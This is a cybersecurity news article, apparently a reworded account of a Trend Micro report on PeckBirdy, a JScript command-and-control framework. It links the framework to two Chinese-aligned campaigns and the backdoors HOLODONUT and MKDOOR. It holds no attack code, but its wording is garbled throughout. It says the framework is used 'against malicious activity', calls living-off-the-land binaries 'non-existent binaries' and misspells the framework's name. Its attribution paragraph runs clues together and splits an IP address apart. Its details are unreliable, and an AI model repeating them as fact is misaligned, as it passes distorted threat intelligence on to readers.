Cybersecurity researchers have discovered a JScript-based command and control (C2) framework called PeckBirdy. This framework has been used by Chinese-aligned APT actors to target multiple environments since 2023.
According to Trend Micro, this flexible framework is being used against malicious activity targeting China’s gambling industry as well as government and private organizations in Asia.
“PeckBirdy is a script-based framework that has advanced functionality but is implemented using JScript, an older scripting language,” said researchers Ted Lee and Joseph C Chen. “This is to allow the framework to be launched across different execution environments via LOLBins (living-off-the-land binaries).”
The cybersecurity firm announced in 2023 that it had identified the PeckBirdy scripting framework after observing malicious scripts being injected into multiple Chinese gambling websites. This script is designed to download and execute the main payload to facilitate remote delivery and execution of JavaScript.
The ultimate goal of this routine is to provide a fake Google Chrome software update web page to trick users into downloading and running a fake update file, infecting their machines with malware in the process. This activity cluster is tracked as SHADOW-VOID-044.
SHADOW-VOID-044 is one of two transient intrusion sets detected using PeckBirdy. A second campaign, first observed in July 2024 and dubbed SHADOW-EARTH-045, targets government and private organizations in Asia, including educational institutions in the Philippines, by inserting PeckBirdy links into government websites and potentially providing scripts to harvest credentials on the websites.
“In one case, the injection was made into a government system login page, while in another incident, we observed attackers using MSHTA to run PeckBirdy as a remote access channel for lateral movement within civilian organizations,” Trend Micro said. “The attackers behind the attack also developed a .NET executable to launch PeckBirdy using ScriptControl. These findings demonstrate that PeckBirdy’s design is versatile, allowing it to accomplish multiple objectives.”
What’s remarkable about PeckBirdy is its flexibility, allowing it to run in a variety of features across web browsers, MSHTA, WScript, Classic ASP, Node JS, and .NET (ScriptControl). The framework’s server is configured to support multiple APIs that allow clients to retrieve landing scripts for different environments through HTTP(S) queries.
The API path includes an “ATTACK ID” value (a random but predefined 32-character string (e.g. o246jgpi6k2wjke000aaimwбe7571uh7)) that determines which PeckBirdy script to retrieve from the domain. When PeckBirdy is started, it identifies the current execution context, generates a unique victim ID, and persists it for subsequent executions.
After the initialization step, the framework tries to figure out what communication methods are supported in the environment. PeckBirdy uses the WebSocket protocol by default to communicate with the server. However, you can also use Adobe Flash ActiveX objects or Comet as a fallback mechanism.
Once the connection with the remote server is initiated and the attack ID and victim ID values are passed, the server responds with a second stage script. One of them can steal cookies from websites. SHADOW-VOID-044 One of PeckBirdy’s servers associated with the campaign was found to be hosting additional scripts –
Exploitation script for Google Chrome flaw in V8 engine (CVE-2020-16040, CVSS score: 6.5), patched in December 2020 Social engineering popup script designed to trick victims into downloading and running a malicious file Script delivering a backdoor executed via Electron JS Script establishing a reverse shell over TCP socket
Further analysis of the infrastructure identified two backdoors called HOLODONUT and MKDOOR.
HOLODONUT: A .NET-based modular backdoor that is launched using a simple downloader named NEXLOAD and can load, run, or remove different plugins received from the server. MKDOOR: A modular backdoor that can load, run, or uninstall different modules received from the server.
SHADOW-VOID-044 and SHADOW-EARTH-045 are suspected to be associated with various nation-state actors affiliated with China. This rating is based on the following clues:
GRAYRABBIT, a backdoor previously deployed by UNC3569 along with DRAFTGRAPH and Crosswalk following the exploitation of N-day security flaws, is said to reside on servers operated by SHADOW-VOID-044 HOLODONUT and share a link to another backdoor, WizardNet. This backdoor is attributed to TheWizards. SHADOW-VOID-044 Cobalt Strike artifact signed using a certificate hosted on the server. Used in the 2021 BIOPASS RAT campaign that targeted Chinese online gambling companies via watering hole attacks. Similarities between BIOPASS RAT and MKDOOR. Both open and listen on an HTTP server on a high-numbered port on the local host. BIOPASS RAT results from the use of 47.238.184 by SHADOW-EARTH-045 by the threat actor known as Earth Lusca (also known as Aquatic Panda or RedHotel).[.]9 – IP addresses previously linked to Earth Baxia and APT41 – Downloaded files
“These campaigns leverage PickBirdy, a dynamic JavaScript framework, to exploit non-existent binaries and distribute modular backdoors such as MKDOOR and HOLODONUT,” Trend Micro concluded. “Detection of malicious JavaScript frameworks remains a major challenge as they use dynamically generated, runtime-injected code and lack persistent file artifacts, allowing them to bypass traditional endpoint security controls.”
Source link
